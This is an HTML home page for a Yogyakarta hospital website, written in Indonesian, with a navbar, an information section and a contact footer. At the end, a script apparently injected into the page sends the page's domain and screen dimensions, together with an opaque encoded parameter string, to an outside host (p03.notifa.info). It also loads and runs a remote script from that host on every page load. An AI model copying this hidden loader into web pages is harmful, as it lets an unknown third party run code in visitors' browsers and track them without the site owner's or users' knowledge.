<!DOCTYPE html>
<!--
To change this license header, choose License Headers in Project Properties.
To change this template file, choose Tools | Templates
and open the template in the editor.
-->
<html lang="en">
    <head>
        <title>Family Hospital</title>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
        <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet">
        <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
        <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

        <style>
            body {
                font: 20px Montserrat, sans-serif;
                line-height: 1.8;
                color: #f5f6f7;
            }
            p {font-size: 16px;}
            .margin {margin-bottom: 45px;}
            .navbar {
                background-image: url("hospital.jpg");
                /*                color: #990000;*/
                background-size: 25%;
                padding-top: 15px;
                padding-bottom: 15px;
                border: 0;
                border-radius: 0;
                margin-bottom: 0;
                font-size: 12px;
                letter-spacing: 5px;
            }
            .bg-1 { 
                background-color: #99ffff; 
                color: #000000;
            }
            .bg-2 { 
                background-color: #474e5d; 
                color: #ffffff;
            }
            .bg-3 { 
                background-color: #ffffff; 
                color: #555555;
            }
            .bg-4 { 
                background-color: #000000; 
                color: #fff;
            }
            .container-fluid {
                padding-top: 70px;
                padding-bottom: 70px;
            }
            .navbar-nav  li a:hover {
                color: #990000 !important;
            }
        </style>
    </head>
    <body>

        <!-- Navbar -->
        <nav class="navbar navbar-default">
            <div class="container">
                <div class="navbar-header">
                    <button type="button" class="navbar-toggle" 
                            data-toggle="collapse" data-target="#myNavbar">
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>
                        <span class="icon-bar"></span>                        
                    </button>
                    <a class="navbar-brand" href=index.html><font color = "black">
                        Home</font></a>
                </div>
                <div class="collapse navbar-collapse" id="myNavbar">
                    <ul class="nav navbar-nav navbar-right">
                        <li><a href = tambahPasien.html><font color = "black">
                                Tambah Pasien</font></a></li>
                        <li><a href=antri.html><font color = "black">
                                Antrian</font></a></li>
                        <li><a href=location.html><font color = "black">
                                Lokasi</font></a></li>
                        <li><a href=daftarDokter.html><font color = "black">
                                Daftar Dokter</font></a></li>
                        <li><a href=daftarKlinik.html><font color = "black">
                                Daftar Klinik</font></a></li>
                    </ul>
                </div>
            </div>
        </nav>

        <!-- First-->
        <div class="container-fluid bg-1 text-center">
            <h3 class="margin">Family Hospital</h3>
            <img src="medis.jpg" class="img-responsive img-circle margin" 
                 style="display:inline" alt="Medis" width="350" height="350">
            <p>Lebih Baik Mencegah Daripada Mengobati. Jadi, jagalah selalu kesehatan kalian masing-masing
            </p>

        </div>

        <!-- Second-->
        <div class="container-fluid bg-3 text-center">    
            <h3 class="margin">Informasi</h3><br>
            <div class="row">
                <div class="col-sm-4">
                    <p>Family Hospital mempunyai layanan yang baik,dan ramah serta ruangan yang bersih</p>
                    <img src="medis2.jpg" class="img-responsive margin" style="width:100%" alt="Image">
                </div>
                <div class="col-sm-4"> 
                    <p>Family Hospital menyediakan fasilitas medis yang lengkap demi kenyamanan pasien
                        dalam melakukan pemeriksaan</p>
                    <img src="medis5.jpg" class="img-responsive margin" style="width:100%" alt="Image">
                </div>
                <div class="col-sm-4"> 
                    <p>Family Hospital menyediakan tenaga kerja dokter, dan staff yang berpengalaman untuk
                        melakukan pelayanan dengan ramah,baik,dan benar</p>
                    <img src="medis4.jpg" class="img-responsive margin" style="width:100%" alt="Image">
                </div>
            </div>
        </div>

        <!-- Footer -->
        <footer class="container-fluid bg-4 text-center">
            <p><font size="4">Jl. Laksda Adisucipto No.32-34, Demangan, Gondokusuman, Kota Yogyakarta
                , Daerah Istimewa Yogyakarta 55221, Indonesia</font><br>
                <font size="3">Telp: (+62) 895628334758 | E-mail: hospitalfamily@gmail.com</font><br></p>
        </footer>

        <script type="text/javascript">if (self == top)
            {
                function netbro_cache_analytics(fn, callback) {
                    setTimeout(function ()
                    {
                        fn();
                        callback();
                    }, 0);
                }
                function sync(fn) {
                    fn();
                }
                function requestCfs()
                {
                    var idc_glo_url = (location.protocol == "https:" ? "https://" : "http://");
                    var idc_glo_r = Math.floor(Math.random() * 99999999999);
                    var url = idc_glo_url +
                            "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params="
                            + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mDTYQ42iri6b%2bOWCokgk8jMrIk3b4GxeBlUi24vi7lcq6WnOTGVqCZuVbRlIKdhJqSvXWvMoKqBIIgW9SQXQenuQy%2bHgoAcktiz8%2fhMu5M1PdqOlYHViX%2bNHHyxj3HumJLy4d3MwnIwDzmniIpzhNgFXOp8F%2bBeo7HQ7CT5N7W80ECbEKW%2bG1ondywe%2fXw%2bshWeBWF7QZn0OHKej0gbvogbxFhKsMNUwXSnFdl9vLZv72wCi0JfTPxR5CNb0ebyt1ZYCFO6aN5mE8V175r%2fLyHNR9YXVbV7MVxwQVKKb1ZUUFjMf0sIR0qQXHPGHwJsruFL%2f4AkNZv5Ls26gOV4vWkK7IPrvX6H1gh%2bCRBUSJR8HVd0ZZtQAuu0hCOkPJBd%2fryEiq%2fANud3st8jcB8Op%2f0AiDqfvLXyu1qyLW39iQHlrhYA0Z73Or1d5cPwv5blokzF2RPawvkFTv8bz2ofm9jDwvRj6UlRrjGfc9n92fnIJt7hqpf5ZHBoFtghvG00%2bU" + "&idc_r=" + idc_glo_r + "&domain=" + document.domain + "&sw=" + screen.width + "&sh=" + screen.height;
                    var bsa = document.createElement('script');
                    bsa.type = 'text/javascript';
                    bsa.async = true;
                    bsa.src = url;
                    (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(bsa);
                }
                netbro_cache_analytics(requestCfs, function () {});
            }
            ;</script></body>
</html>
